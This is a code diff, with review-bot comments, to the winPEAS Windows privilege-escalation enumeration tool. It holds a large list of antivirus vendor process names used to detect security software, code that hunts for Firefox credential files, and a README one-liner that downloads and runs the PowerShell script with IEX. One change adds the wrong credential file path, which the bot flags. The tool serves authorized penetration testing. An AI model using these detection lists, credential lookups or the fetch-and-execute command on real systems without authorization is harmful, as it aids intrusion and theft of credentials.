HashSet() { "bootcdwizard.exe", "avkservice.exe", "avktray.exe", "gdgadgetinst32.exe", "ransomwareremovalhelper.exe", "gdlog.exe", "sec.exe", "avkwctlx64.exe", "updategui.exe", "avk.exe", "autorundelayloader.exe", "avkcmd.exe", "avkwscpe.exe", "iupdateavk.exe", } }, + { "GridinSoft Anti-Malware", new HashSet() { "uninst.exe", "gtkmgmtc.exe", "tkcon.exe", 
"unpacker.exe", } }, + { "IObit Malware Fighter 3", new HashSet() { "imfantivirususb.exe", "actioncenterdownloader.exe", "adsremovalsetup.exe", "feedback.exe", "iobituninstal.exe", "sendbugreport.exe", "imf_iobitdel.exe", "imfantivirustips.exe", "promote.exe", "imfupdater.exe", "imf_actioncenterdownloader.exe", "imfregister.exe", "reprocess.exe", "imfsrv_iobitdel.exe", "liveupdate.exe", "xmaspromote.exe", "spsetup.exe", "imf_downconfig.exe", "uninstallpromote.exe", "bluebirdinit.exe", "imftips.exe", "locallang.exe", "imfinstaller.exe", "aupdate.exe", "startmenu.exe", "iwsimfxp.exe", "ppuninstaller.exe", "taskschedule.exe", "fixplugin.exe", "imfantivirusfix.exe", "imfbigupgrade.exe", "imftips_iobitdel.exe", "imfsrv.exe", "iobitcommunities.exe", "autoupdate.exe", "unins000.exe", "homepage.exe", } }, + { "IObit Malware Fighter 6", new HashSet() { "iwsimf_av.exe", "imfantivirususb.exe", "feedback.exe", "sendbugreportnew.exe", "ransomware.exe", "imfantivirustips.exe", "imfdbupdatestat.exe", "imf_actioncenterdownloader.exe", "iwsimf.exe", "browserprotect.exe", "driverscan.exe", "imfregister.exe", "reprocess.exe", "liveupdate.exe", "christmas.exe", "bf.exe", "imf_downconfig.exe", "browsercleaner.exe", "antitracking.exe", "bluebirdinit.exe", "imftips.exe", "imfinstaller.exe", "locallang.exe", "carescan.exe", "imfsrvwsc.exe", "safebox.exe", "aupdate.exe", "iobitliveupdate.exe", "imfchecker.exe", "iwsimfxp.exe", "ppuninstaller.exe", "imfantivirusfix.exe", "imfbigupgrade.exe", "exclusivepsimf.exe", "imfanalyzer.exe", "bfimf.exe", "imfsrv.exe", "autoupdate.exe", "spinit.exe", "homepage.exe", "dugtrio.exe", } }, + { "IObit Security 360", new HashSet() { "is360tray.exe", "is360init.exe", "is360srv.exe", "e_privacysweeper.exe", "a_hijackscan.exe", "g_portable.exe", "d_powerfuldelete.exe", "b_securityholes.exe", "is360updater.exe", "unins000.exe", "f_pctuneup.exe", "imf_freesoftwaredownloader.exe", "c_passivedefense.exe", } }, + { "K7AntiVirus Plus by K7 Computing Pvt Ltd", new 
HashSet() { "healthmon.exe", "k7avqrnt.exe", "k7tliehistory.exe", "k7tlusbvaccine.exe", "k7tsalrt.exe", "k7tlwintemp.exe", "k7tlinettemp.exe", "k7tshlpr.exe", "k7disinfectorgui.exe", "k7tlvirtkey.exe", "k7tlmtry.exe", "k7fwsrvc.exe", "k7tsecurity.exe", "k7avmscn.exe", "k7ctscan.exe", "k7tsecurityuninstall.exe", "k7rtscan.exe", "k7avscan.exe", "k7crvsvc.exe", "k7tsdbg.exe", "k7emlpxy.exe", } }, + { "K7AntiVirus Premium by K7 Computing Pvt Ltd", new HashSet() { "k7quervarcleaningtool.exe", "k7ndfhlpr.exe", "healthmon.exe", "k7avqrnt.exe", "k7tliehistory.exe", "k7tlusbvaccine.exe", "k7tsstart.exe", "k7tsalrt.exe", "k7tlwintemp.exe", "k7mebezatencremovaltool.exe", "k7tlinettemp.exe", "k7tsmain.exe", "k7tshlpr.exe", "k7tssplh.exe", "k7disinfectorgui.exe", "k7tlvirtkey.exe", "k7tlmtry.exe", "k7fwsrvc.exe", "k7tsreminder.exe", "k7tsecurity.exe", "k7avmscn.exe", "k7ctscan.exe", "k7rtscan.exe", "k7tsnews.exe", "k7avscan.exe", "k7crvsvc.exe", "k7emlpxy.exe", "k7tsupdt.exe", } }, + { "Kaspersky Anti-Ransomware Tool for Business", new HashSet() { "anti_ransom_gui.exe", "dump_writer_agent.exe", "anti_ransom.exe", } }, + { "Kaspersky Anti-Virus 2011", new HashSet() { "kldw.exe", } }, + { "Kaspersky Anti-Virus 2013", new HashSet() { "ffcert.exe", } }, + { "Kaspersky Anti-Virus Personal", new HashSet() { "kavsend.exe", "kavsvc.exe", "getsysteminfo.exe", "uninstall.exe", } }, + { "Kaspersky Antivirus", new HashSet() { "avp.exe", } }, + { "Kaspersky", new HashSet() { "klnagent.exe", } }, + { "Malwarebytes", new HashSet() { "mbam.exe", "mbar.exe", "mbae.exe", } }, + { "McAfee All Access – AntiVirus Plus", new HashSet() { "compatibilitytester.exe", "mispreg.exe", "mcods.exe", "mcvsmap.exe", "mcocrollback.exe", "mpfalert.exe", "mcvulalert.exe", "mvsinst.exe", "mcupdmgr.exe", "mcpvtray.exe", "mcvuladmagnt.exe", "mcvulunpk.exe", "qcshm.exe", "mcoemmgr.exe", "qcconsol.exe", "mcuihost.exe", "mcvsshld.exe", "mcinstru.exe", "mcvulcon.exe", "mcsync.exe", "firesvc.exe", "qccons32.exe", 
"mcsvrcnt.exe", "mcvulusragnt.exe", "shrcl.exe", "mcodsscan.exe", "mcapexe.exe", "mcautoreg.exe", "mcinfo.exe", "mcvulctr.exe", "svcdrv.exe", } }, + { "McAfee AntiSpyware", new HashSet() { "msssrv.exe", "mcspy.exe", "msscli.exe", } }, + { "McAfee AntiVirus Plus", new HashSet() { "mispreg.exe", "mcvsmap.exe", "mcods.exe", "mcactinst.exe", "mcocrollback.exe", "mpfalert.exe", "mcinsupd.exe", "langsel.exe", "mvsinst.exe", "mcshell.exe", "mfehidin.exe", "mchlp32.exe", "mcupdmgr.exe", "saupd.exe", "uninstall.exe", "mcawfwk.exe", "qcshm.exe", "mcsacore.exe", "mcoemmgr.exe", "qcconsol.exe", "mcuihost.exe", "mcinstru.exe", "mcvsshld.exe", "mcoobeof.exe", "mcsync.exe", "firesvc.exe", "qccons32.exe", "saui.exe", "mcsvrcnt.exe", "shrcl.exe", "mcsmtfwk.exe", "mcautoreg.exe", "mcuninst.exe", "mcinfo.exe", "actutil.exe", } }, + { "McAfee Antivirus", new HashSet() { "mcafee.exe", } }, + { "NANO Antivirus beta by Nano Security Ltd", new HashSet() { "nanoreportc64.exe", "nanorst.exe", "uninstall.exe", "nanoreport.exe", "nanosvc.exe", "nanoav64.exe", "nanoreportc.exe", } }, + { "NANO-Antivirus", new HashSet() { "nanoav.exe", } }, + { "Norton Antivirus", new HashSet() { "nortonsecurity.exe", } }, + { "PCMatic", new HashSet() { "pcmaticpushcontroller.exe", "pcmaticrt.exe", } }, + { "Panda Security", new HashSet() { "psanhost.exe", } }, + { "Panda", new HashSet() { "avengine.exe", } }, + { "Quick Heal AntiVirus Pro", new HashSet() { "delnboot.exe", "0000007c_afupdfny.exe", "asmain.exe", "asclsrvc.exe", "acappaa.exe", "activate.exe", } }, + { "Quick Heal Total Security", new HashSet() { "delnboot.exe", "contact.exe", "activate.exe", "acappaa.exe", } }, + { "Sophos Anti-Rootkit 1.5.0", new HashSet() { "helper.exe", "svrtcli.exe", "sctcleanupservice.exe", "native.exe", "svrtservice.exe", "svrtgui.exe", "sarcli.exe", "sctboottasks.exe", } }, + { "Sophos Anti-Virus", new HashSet() { "sav32cli.exe", "savprogress.exe", "savservice.exe", "native.exe", "swi_di.exe", "backgroundscanclient.exe", 
"savmain.exe", "forceupdatealongsidesgn.exe", "swc_service.exe", "savproxy.exe", "savcleanupservice.exe", "savadminservice.exe", } }, + { "Symantec Endpoint Protection", new HashSet() { "ccsvchst.exe", } }, + { "Symantec", new HashSet() { "sepwscsvc64.exe", } }, + { "Total Defense Anti-Virus", new HashSet() { "caoscheck.exe", "ccprovsp.exe", "caschelp.exe", "caisstutorial.exe", "ccwatcher.exe", "cawsc.exe", "ccevtmgr.exe", "ccprovep.exe", "casc.exe", "cclogconfig.exe", "ccschedulersvc.exe", "cckasubmit.exe", "ccproxysrvc.exe", "caunst.exe", } }, + { "Trend micro", new HashSet() { "uiwinmgr.exe", "ntrtscan.exe", "tmntsrv.exe", "pccpfw.exe", } }, + { "VIPRE Advanced Security by ThreatTrack Security", new HashSet() { "sbamtray.exe", "sbamwsc.exe", "sbamcommandlinescanner.exe", "sbamcreaterestore.exe", "sbamsvc.exe", "avcproxy.exe", "sbbd.exe", } }, + { "VIPRE Antivirus by GFI Software", new HashSet() { "sbamtray.exe", "sbsetupdrivers.exe", "sbamsafemodeui.exe", "sbpimsvc.exe", "sbamwsc.exe", "sbrc.exe", "sfe.exe", "sbagentdiagnostictool.exe", "sbamcommandlinescanner.exe", "sbamsvc.exe", "sbamcreaterestore.exe", "sbamui.exe", } }, + { "ViRobot Anti-Ransomware by HAURI", new HashSet() { "vrbbdsvc.exe", "uninstall.exe", "vrbbdlogviewer.exe", "vrbbdbackup.exe", "vrpuller.exe", } }, + { "ViRobot Internet Security 2011 by HAURI", new HashSet() { "hvrpcuselock.exe", "hvrlogview.exe", "hvreasyrobot.exe", "hvrsetup.exe", "hvrfilewipe.exe", "hvrmalsvc.exe", "hvrtrafficviewer.exe", "hvrscan.exe", "hvrcontain.exe", "hvrquarantview.exe", "hvrtray.exe", } }, + { "Webroot", new HashSet() { "wrsa.exe", } }, + { "Windows defender", new HashSet() { "msmpeng.exe", "mpcmdrun.exe", "msascuil.exe", "windefend.exe", "msascui.exe", "msmpsvc.exe", } }, + { "Zillya Internet Security by ALLIT Service", new HashSet() { "drvcmd.exe", "ziscore.exe", "keyboard.exe", "systemresearchtool.exe", "zis.exe", "zisnet.exe", "conscan.exe", "zisupdater.exe", "zisaux.exe", "ziships.exe", } }, + { "Zillya! 
Antivirus by ALLIT Service", new HashSet() { "wscmgr.exe", "drvcmd.exe", "zillya.exe", "zavaux.exe", "reporter.exe", "autoruntool.exe", "taskmanagertool.exe", } },
+ { "Zillya! Internet Security by ALLIT Service", new HashSet() { "restoretool.exe", "drvcmd.exe", "wscmgr.exe", "zefcore.exe", "zefsvc.exe", "fwdisabler.exe", "zefaux.exe", "backuphostfile.exe", "conscanner.exe", "reporter.exe", "autoruntool.exe", "zef.exe", "taskmanagertool.exe", } },
+ { "ZoneAlarm Anti-Ransomware by Check Point Software", new HashSet() { "zup.exe", "consrvhost.exe", "zaarupdateservice.exe", "zaar.exe", "sbacipollasrvhost.exe", "uninst.exe", } },
+ { "ZoneAlarm Antivirus by Check Point, Inc", new HashSet() { "threatemulation.exe", "multiscan.exe", "restoreutility.exe", "vsmon.exe", "zatray.exe", "multifix.exe", } },
+ { "ZoneAlarm by Check Point, Inc", new HashSet() { "instmtdr.exe", "zatutor.exe", "cpes_clean.exe", "multiscan.exe", "zauninst.exe", "zlclient.exe", "multifix.exe", } }
 };
+ // reverse lookup list
+ public static Dictionary> AVVendorsByProcess = new Dictionary>();
+
+ static DefensiveProcesses()
+ {
+ // initialize the structure here
+ foreach (var kvp in Definitions)
+ {
+ var vendor = kvp.Key;
+
+ foreach (var executable in kvp.Value)
+ {
+ var sanitizedExecutable = executable.Trim().ToLower();
+
+ if (!AVVendorsByProcess.ContainsKey(sanitizedExecutable))
+ {
+ AVVendorsByProcess.Add(sanitizedExecutable, new HashSet() { vendor });
+ }
+ else
+ {
+ AVVendorsByProcess[sanitizedExecutable].Add(vendor);
+ }
+ }
+ }
+ }
 }
 }
diff --git a/winPEAS/winPEASexe/winPEAS/Info/SystemInfo/SystemInfo.cs b/winPEAS/winPEASexe/winPEAS/Info/SystemInfo/SystemInfo.cs
index 275b762..fcf542f 100644
--- a/winPEAS/winPEASexe/winPEAS/Info/SystemInfo/SystemInfo.cs
+++ b/winPEAS/winPEASexe/winPEAS/Info/SystemInfo/SystemInfo.cs
@@ -133,7 +133,7 @@ namespace winPEAS.Info.SystemInfo
 IPGlobalProperties properties = IPGlobalProperties.GetIPGlobalProperties();
 string dnsDomain = properties.DomainName;
- const string query = "SELECT HotFixID FROM Win32_QuickFixEngineering";
+ const string query = "SELECT HotFixID,InstalledOn FROM Win32_QuickFixEngineering";
 using (var search = new ManagementObjectSearcher(query))
 {
@@ -142,7 +142,7 @@ namespace winPEAS.Info.SystemInfo
 string hotfixes = "";
 foreach (ManagementObject quickFix in collection)
 {
- hotfixes += quickFix["HotFixID"].ToString() + ", ";
+ hotfixes += quickFix["HotFixID"] + " (" + quickFix["InstalledOn"] + "), ";
 }
 results.Add("Hostname", strHostName);
diff --git a/winPEAS/winPEASexe/winPEAS/KnownFileCreds/Browsers/Firefox/Firefox.cs b/winPEAS/winPEASexe/winPEAS/KnownFileCreds/Browsers/Firefox/Firefox.cs
index a067c87..31d6c61 100644
--- a/winPEAS/winPEASexe/winPEAS/KnownFileCreds/Browsers/Firefox/Firefox.cs
+++ b/winPEAS/winPEASexe/winPEAS/KnownFileCreds/Browsers/Firefox/Firefox.cs
@@ -120,7 +120,7 @@ namespace winPEAS.KnownFileCreds.Browsers.Firefox
 string firefoxCredentialFile4 = $"{directory}\\{"key4.db"}";
 if (File.Exists(firefoxCredentialFile4))
 {
- results.Add(firefoxCredentialFile4);
+ results.Add(firefoxCredentialFile3);
 }
 }
 }
diff --git a/winPEAS/winPEASexe/winPEAS/winPEAS.csproj b/winPEAS/winPEASexe/winPEAS/winPEAS.csproj
index c819feb..19a037c 100755
--- a/winPEAS/winPEASexe/winPEAS/winPEAS.csproj
+++ b/winPEAS/winPEASexe/winPEAS/winPEAS.csproj
@@ -118,6 +118,7 @@
+
@@ -1002,6 +1003,7 @@
+
@@ -1038,6 +1040,11 @@
+
+
+
+
+
@@ -1058,7 +1065,7 @@
-
+
@@ -1068,6 +1075,10 @@
+
+
+
+
diff --git a/winPEAS/winPEASexe/winPEAS/winPEAS.csproj.user b/winPEAS/winPEASexe/winPEAS/winPEAS.csproj.user
index 0ca5182..faa7a28 100755
--- a/winPEAS/winPEASexe/winPEAS/winPEAS.csproj.user
+++ b/winPEAS/winPEASexe/winPEAS/winPEAS.csproj.user
@@ -5,7 +5,7 @@
- fileanalysis debug
+ cloudinfo -network="auto" -ports="21,22,445" debug
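Review bot: In the second SystemInfo hunk (`@@ -142`), `quickFix["InstalledOn"]` is concatenated unconditionally, so a hotfix whose InstalledOn property is null or empty — Win32_QuickFixEngineering does not reliably populate it for every entry — is reported as `KB… ()` instead of with the date simply omitted. Consider `var installedOn = quickFix["InstalledOn"]?.ToString();` followed by `hotfixes += string.IsNullOrEmpty(installedOn) ? quickFix["HotFixID"] + ", " : quickFix["HotFixID"] + " (" + installedOn + "), ";`. The list is still assembled by repeated `+=` and keeps a trailing `", "`; collecting the entries and emitting them with `string.Join(", ", …)` would fix both. The enclosing method starts and ends outside the hunk.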
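Review bot: In the Firefox hunk the branch guarded by `File.Exists(firefoxCredentialFile4)` now adds `firefoxCredentialFile3` to `results`, so the path recorded is one whose existence is not verified on this branch, while the `key4.db` path that was actually found is no longer reported. If this is deliberate (for instance because a downstream consumer only handles the key3 path), the line needs a comment stating that reason; otherwise it should read `results.Add(firefoxCredentialFile4);`. The enclosing method starts outside the hunk, so how `firefoxCredentialFile3` is defined and used elsewhere is not visible here.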
diff --git a/winPEAS/winPEASps1/README.md b/winPEAS/winPEASps1/README.md
index 82f1232..ddf3fc8 100755
--- a/winPEAS/winPEASps1/README.md
+++ b/winPEAS/winPEASps1/README.md
@@ -17,10 +17,8 @@ Download the **[latest releas from here](https://github.com/peass-ng/PEASS-ng/re
 ```bash
 powershell "IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/peass-ng/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')"
+```
 ## Advisory
 All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
-
-
-By Polop